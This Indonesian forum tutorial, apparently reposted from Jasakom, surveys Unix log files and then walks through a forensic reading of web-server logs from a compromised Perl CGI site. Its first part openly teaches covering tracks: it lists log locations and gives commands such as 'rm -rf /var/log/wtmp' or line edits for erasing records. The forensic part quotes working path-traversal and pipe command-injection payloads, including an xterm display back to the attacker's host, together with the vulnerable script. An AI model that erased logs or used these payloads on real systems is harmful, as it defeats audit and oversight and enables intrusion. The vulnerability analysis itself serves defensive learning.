.log file ??? ini sebuah file yang berisi tentang catatan apapun yang dilakukan oleh siapapun dalam sebuah mesin. Untuk bisa mengakses ini yang dibutuhkan adalah anda sebagai root/SU. File ini bisa dibuka atau diedit dengan cara menggunakan text editor dan hexa editor sesuai dengan jenis/macamnya. Loh kok macamnya??? Emangnya ada berapa macam yang sich log file itu???
Ini macem ato jenis dari dari file log itu, tapi kalo ada kesalahan mohon maaf dan di koreksi yach temen-temen,bunga masih belajar
1. .history: mencatat semua hal yang dilakukan oleh user, biasanya tersimpan dalam directory user. Sangat mudah dihapus ato di edit, asalkan kita sebagai SU statusnya.
2. acct ato pact: mencatat semua hal yang dilakukan oleh user, tetapi tidak mencatat program yang dijalankan oleh user, ini hanya catatan harian sebuah mesin, jadi ukuran file bisa bertambah besar setiap harinya. Biasanya terletak pada /var/adm/savacct.
3. access_log: mencatat access file pada www seperti: pemanggilan hostname, remote login, waktu access dan perintah-perintah pada http, digunakan pada NCSA httpd server. Biasanya berupa text biasa, sangat mudah diedit hanya menggunakan text editor.
4. aculog: mencatat pemakaian modem.
5. lastlog: mencatat user yang login,baik yang masuk ato gagal login. Didalemnya terekam IP address dari user tersebut.sangat mudah dihapus,pake coomannd ajah lsg terhapus kok.
6. loginlog: mencatat hanya user yang gagal login biasanya setelah 5 kali percobaan gagal login baru tercatat. Bentuknya hanya file text bisa, jadi sangat mudah dihapus ato diedit.
7. messages: mencatat hasil apapun yang dikeluarkan oleh syslog. Bentuknya hanya file text bisa, jadi sangat mudah dihapus ato diedit.
8. sulog: mencatat apapun yang dilakukan oleh su. Bentuknya hanya file text bisa, jadi sangat mudah dihapus ato diedit.
9. utmp: mencatat siapa saja yang sedang login ato berada dalam sebuah mesin. Biasanya menggunakan command who untuk mengetahui penyusup yang sedang asik-asikan didalam mesin. File ini berekstensi utmpx.
10. wtmp: mencatet user yang login menggunakan ftp,berekstensi wtmpx, dan menggunakan hexaeditor untuk mengeditnya.
11. vold.log: mencatat error pada mesin yang menggunakan media external,contoh cd room, floppy, dsb.
12. xferlog: mencatat penggunaan ftp (hampir sama spt wmtp).
13. syslog:
Setelah kita mengetahui sedikit tentang macam-macamnya lalu kita akan mencoba telusuri lebih dalam lagi,.semua file diatas terangkum dalam sebuah file yang dinamakan syslog. Syslog ini mempunyai daemon yang berguna sebagai “jantungnya” dinamakan syslogd. Sewaktu syslog ini berjalan dia akan menuju file conf yang terletak pada /etc/syslog.conf yang membaca dari tiga buah report yang dikeluarkan oleh:
a. /dev/klog(membaca kernel report)
b. /dev/log(membaca report program yang berjalan pada local mesin)
c. UDP port 514(membaca report program yang berjalan pada network)
So sedikit kita sudah mengetahui tentang file log ini,..tapi…dimanakah file tersebut berada??? Untuk hal yang satu ini tempatnya abstrak alias bisa dipindah-pindah, admin yang topcer biasanya menyembunyikan file ini dalam brangkasnya,..hehehehehhe..gak mungkin lah Bunga, iya gak mungkin dalam brangkas siy, tapi memang diumpetin serapat-rapatnya serahasia hanya admin dan Tuhan yang mengetahuinya. Tapi jangan sedih dulu, menurut pengalaman Bunga, Masih banyak admin yang teledor dengan asumsi masih diparkirkan pada tempat defaultnya,”because secure is not default”ntu kata hacker inggris, tapi Bunga lupa Nicknya .
Tempatnya file log dari pengalaman Bunga:
• /usr/adm
• /var/adm
• /var/log
Sekali lagi ini gak mutlak loh,.kalo mo jelas,datengin ajah adminnya Tanya passnya,Tanya file lognya, terus minta ijin ajah sekalian pake mesinnya,kalo yang ini halal 100%,.hehehehehehe,.becanda
Dah ketemu file lognya tapi cara membersihkannya bagaimana yach???masnya ambil kain basah lalu lap ajah monitornya, siapa tau bisa bersih,.hehehehehehe,.becanda lagi ding
Caranya pake perintah rm –rf, syntak: command [patch], contoh: rm –rf /var/log/wmtp, ato juga menggunakan text editor sepert vi / nano / pico, cukup hapus baris datanya saja, kurang lebih sama seperti konfigurai dual boot lilo
Yach, sekarang kita lanjutkan lagi, tapi dah pada capek yach,.bikin teh, kopi, or susu jangan lupa cemilannya yach, biar tambah semangat,.GO..GO..GO..
Okey sekarang kita mencoba membedah file log untuk mengetahui vulnerbilty pada mesin kita,.sebelumnya, sekali lagi maafkan Bunga jika ada kesalahan, mas, om, mba, tante, kakak, yang lebih senior dan jago Bunga minta ijin,.”satu guru satu ilmu dilarang saling menggangu”,.hehehehehehehe,…
Berikut ini contoh kasus pada http://www.c**.co.id, Bunga pernah melakukan forensic pada mesin servernya, web programernya menggunakan script CGI Perl, Servernya diobrak-abrik oleh craker gila, tapi dia agak sembrono dimana dia tidak menghapus track nya pada access_log,(untuk IP nya disamarkan):
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / HTTP/1.0” 200 3008
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / A1.jpg HTTP/1.0” 200 3456
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / V90.jpg HTTP/1.0” 200 6943
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / RG7.jpg HTTP/1.0” 200 9854
Penjelasan: Attacker dengan no Ip 10.0.*.**, dia hanya melihat-lihat web ini pada halaman utama dan kejadian ini dicatet pada jam 01:02:45.
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / index.cgi?page=contact.shtml HTTP/1.0” 200 309
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / NOW.jpg HTTP/1.0” 200 3456
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / index.cgi?page=layanan.shtml HTTP/1.0” 200 309
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / 9RG7.jpg HTTP/1.0” 200 9854
Penjelasan: Masih sulit apa maksudnya attacker dikarena dia masih melihat-lihat dan mencoba link pada web ini.
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / cgi-bin/ HTTP/1.0” 403 272
Penjelasan: Attacker mulai beraksi, dia mencoba mengakses direktory /cgi-bin/ dan hal hasil yang ditemukannya adalah 403, apa siy artinya 403??? forbiden cuy,.
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / index.cgi HTTP/1.0” 200 3009
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / index.cgi?page=index.cgi HTTP/1.0” 200 399
Penjelasan: Attacker melanjutkan serangannya lagi, sekarang dia mengikuti pola link yang telah lihatnya. Peratama ia memasukan http://www.c**.co.id/index.cgi lalu ia mencoba lagi mamasukan http://www.c**.co.id/index.cgi?page=index.cgi.
Nah dari sini si attacker dapat melihat script index.cgi nya, dari mana ia melihatnya??? Yach dari browsernya lah,.scriptnya tampil di browser .
Kenapa ini bisa terjadi???
Attacker meneliti index.cgi menerima sebuah nama file sebagai seuatu parameter dan memperlihatkan isi dari file tersebut. Disini attacker menggunakan index.cgi itu sendiri untuk menampilkan source codenya.
Source code:
01: #! /usr/bin/perl
02: # perl script to display a page back as requested by the argument
03:
04: require “../cgi-bin/cgi-lib.pl”;
05:
06: &ReadParse(*input);
07:
08: $namafile = $input{page};
09: if ($namafile eq “”) {
10: $namafile = “main.html”;
11: }
12:
13: print &PrintHeader;
14:
15: $namafile = “ /usr/local/apache/htdocs/” . $namafile;
16: open(FILE, $namafile);
17: while(
18: print $_;
19: }
20: close(file);
Sekarang kita ulas dan pelajari,.bugs nya terdapat pada validasi untuk parameter-parameter yang akan dilewatkan ke script index.cgi. Filename yang dilewatkan sebagai parameter dari url ditangkap sebagai sebuah variabel $namafile pada baris 08, ditambahkan ke path absolut” usr/local/apache/htdocs” pada baris 15, dan ditampilkan pada baris 16.
Berarti,...yups betul,.kita bisa dengan mudah mengambil file dari server web
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0” 200 786
Penjelasan: Sekarang attacker mencoba mencari password,.Wow...
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0” 200 1399
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / index.cgi?page=|xterm+ display+10.0.*.**:0.0+%26| HTTP/1.0” 200
Penjelasan: Rupanya ini attacker mengerti tentang unix dan perl, sekarang dia tidak berusaha membuka file dikarenakan dia sekarang menggunakan karakter pipa”|” diikuti dengan command-command pilihannya. Dengan demikian, perl membuka kendali filenya yang dapat menerima output standar hasil dari command-command yang dituliskan pada parameter filename. Disini attacker meminta 2 buah request:
http://www.c**.co.id/index.cgi?page=|ls ... ich+xterm|
disini jelas attacker sebenernya mengeksekusi coomand ls –la/ , id, which xterm,.apa yang didapet dari attacker mengeksekusi coomand tersebut???
Yang didapet adalah: menampilkan daftar file pada direktory root dengan perintah ls –la/, mendapatkan id user yang efektif pada proses eksekusi index.cgi dengan perintah id, dan yang terkahir mendapatkan path xtrem biner dari perintah “which xterm”.
Request yang kedua:
http://www.c**.co.id/index.cgi?page=|xt ... *:0.0+%26|
attacker menjalankan command “xterm – display 10.0.*.**:0.0&”ini berarti dia menjalankan window xterm pada mesin attacker. Lalu apa yang dilakukan???yach udah masukin user, trus pass, masuk deyh,. .
Dari sini kita dapet mengetahui bugs pada mesin kita dengan melihat log yang ditinggalkan oleh attacker.
Yach,.segitu ajah dari bunga tentang menghapus jejak dan buka-bukaan file log tuk dapet vulnerbilty sebuah mesin.
Semoga ajah tulisan ini bermanfaat untuk kemajuan IT security Indonesia.Mohon dikoreksi lagi para senior ato orang-orang yang jago dalam bidang ini,dikarenakan Bunga masih belajar,.
Makacih buat semua orang yang ada didunia dan temen-temen semua di forum,.
Salam hangat
Bungaputrilanacita
Sumber : Jasakom
Komentar